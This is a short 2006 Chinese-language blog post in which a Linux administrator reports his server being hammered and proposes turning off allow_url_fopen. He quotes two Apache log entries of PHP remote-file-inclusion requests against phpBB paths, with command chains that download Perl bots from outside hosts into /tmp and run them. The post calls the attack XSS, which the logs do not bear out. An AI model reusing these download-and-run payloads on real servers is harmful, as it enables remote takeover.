星期四, 6月 15, 2006

PHP的CMD.TXT攻擊

這兩天LINUX的機器非常奇怪,幾乎無法登入進行維護,
無論是使用CONSOLE或是SSH登入都一樣,
看了看APACHE的LOG檔,發現了一堆亂七八糟的HTTP GET,
原來是遭受到XSS ATTACK,這些ATTACK是由各方面而來,經過
一兩個跳板站,進行惡意的網站登入與資源消耗戰,
在網路上翻了翻GOOGEL,好像和Havenard這個組織有關係,
不過由於PHP至今沒有官方的PATCH進行修正,
因此總結各網站的解法,目前只能先將php.ini裡面的設定
allow_url_fopen Off起來,觀察幾天在看看囉...

--ATTACK LOG

213.27.158.2 - - [14/Jun/2006:03:52:18 +0800]
"GET /modules/Forums/admin/admin_db_utilities.php?
phpbb_root_path=http://www.cosmo-
graph.com/eshop/includes/tmp/cmd.txt?&cmd=cd%20/tmp;GET%
20http://www.cosmo-graph.com/eshop/includes/tmp/w0w%20>%
20w0w;perl%20w0w;rm%20w0w*? HTTP/1.0" 200 178 "-"
"Mozilla/5.0"

83.14.177.146 - - [14/Jun/2006:05:28:03 +0800]
"GET /modules/Forums/admin/admin_users.php?
phpbb_root_path=http://www.geocities.com/kingfighter_myb0x/
cmd.txt?&cmd=cd%20/tmp;curl%20-O%20http://217.20.112.211/
bot5.txt%20>%20sess_php;perl%20sess_php?
HTTP/1.0" 200 178 "-" "Mozilla/5.0"

沒有留言:

張貼留言